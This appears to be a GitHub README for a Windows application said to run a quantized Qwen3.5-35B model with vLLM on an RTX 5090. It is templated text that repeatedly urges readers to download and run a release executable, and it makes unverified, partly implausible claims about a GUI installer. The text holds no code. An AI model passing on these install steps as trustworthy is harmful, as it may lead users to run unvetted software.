Skip to content

Repository files navigation

⚙️ vllm-qwen3.5-nvfp4-5090 - Efficient AI Model on RTX 5090

Download

📥 Download and Install

To use the vllm-qwen3.5-nvfp4-5090 application on Windows, follow these steps:

  1. Click the green Download badge above or go directly to the GitHub repository page.

  2. On the repository page, look for the Releases section on the right or in the repository menu.

  3. Find the latest release version. It will have setup files or an executable compatible with Windows.

  4. Download the setup file suitable for your system.

  5. Once downloaded, open the file to start the installation process.

  6. Follow the on-screen instructions to complete the installation.

  7. After installation, you can launch the application from your desktop or Start menu.


💻 System Requirements

To run this software smoothly, your system should meet these specifications:

  • Operating System: Windows 10 or newer (64-bit)

  • Graphics Card: NVIDIA RTX 5090 with at least 32 GB VRAM

  • Processor: Intel Core i7 or AMD Ryzen 7, or better

  • RAM: 32 GB or more recommended

  • Storage: Minimum 10 GB free space

  • Internet: Required to download the software and updates

This software leverages your GPU’s power for best performance. Systems without an NVIDIA RTX 5090 may not run the program correctly.


🚀 Getting Started

After installing the software, follow these steps to get started:

  1. Open the app from your desktop or Start menu.

  2. The program will load the Qwen3.5-35B-A3B model optimized for the RTX 5090.

  3. You will see a user interface with input fields for text.

  4. Type or paste the text you want the AI to process or generate responses to.

  5. Click the “Run” or “Generate” button to start processing.

  6. Wait a few seconds for the output to appear in the results section.

  7. You can adjust settings like context length or response style in the options menu.

The application supports up to 256,000 tokens in context, allowing for complex and long interactions.


⚙️ Features Overview

This version of the application uses state-of-the-art technology to improve speed and accuracy on compatible hardware:

  • Large Context Support: Handles up to 256,000 tokens at once using FP8 key-value cache.

  • NVFP4 Quantization: Compresses model data efficiently to run faster on your RTX 5090 without losing accuracy.

  • Optimized on vLLM: Uses vLLM to manage model loading and execution for smooth responses.

  • Responsive Text Generation: Generates text at about 200 tokens per second, allowing real-time interaction.

  • Custom Chat Template: Supports a chat mode tuned for natural and consistent conversations.

  • Single GPU Use: Runs efficiently on one NVIDIA RTX 5090, without needing multiple cards.


📁 Files Included

The download package contains:

  • Application executable for Windows.

  • Model data files for Qwen3.5-35B-A3B with NVFP4 quantization.

  • Configuration files for default settings.

  • User manual in PDF format.

  • License and readme documentation.


🛠 How It Works

The software uses the Qwen3.5-35B-A3B language model, which employs a mixture of experts (MoE) design. This means it activates only 3 billion parameters at a time out of 35 billion total, saving processing power.

The model is quantized using NVFP4, a special format that reduces memory use on NVIDIA GPUs, particularly the RTX 5090. It allows the software to handle huge amounts of text context efficiently.

vLLM manages the model's data and execution, organizing tasks so the GPU runs at peak performance. This setup delivers a balance between fast response times and high-quality output.


📝 Using the App

  • Start by entering a query or prompt in the input box.

  • Use the “Settings” menu to adjust options like context length (e.g., 4K, 8K, or full 256K tokens).

  • Click “Generate” to have the AI process the prompt.

  • Review the generated text in the results area.

  • For chat use, access the chat interface template that allows continuous conversation with the model.

  • Save output text if needed using the provided option.

The UI is designed for ease of use without programming knowledge.


🔧 Troubleshooting

If you encounter issues:

  • Ensure your RTX 5090 drivers are up to date.

  • Confirm your system meets the minimum requirements.

  • Restart the application and try again.

  • Check that you have installed all required files.

  • If performance is slow, close other demanding programs.

  • Visit the repository page for any updates or known issues.

  • Contact support through the repository’s issue tracker if necessary.


🔗 Useful Links


📥 Download Again

Use this link to visit the download page for the latest version:

Download vllm-qwen3.5-nvfp4-5090

About

Run Qwen3.5-35B MoE model on RTX 5090 with vLLM using NVFP4 quantization for fast, efficient text generation and extended context length support.

Topics

Resources

Stars

Watchers

Forks

Releases

Packages

Contributors

Languages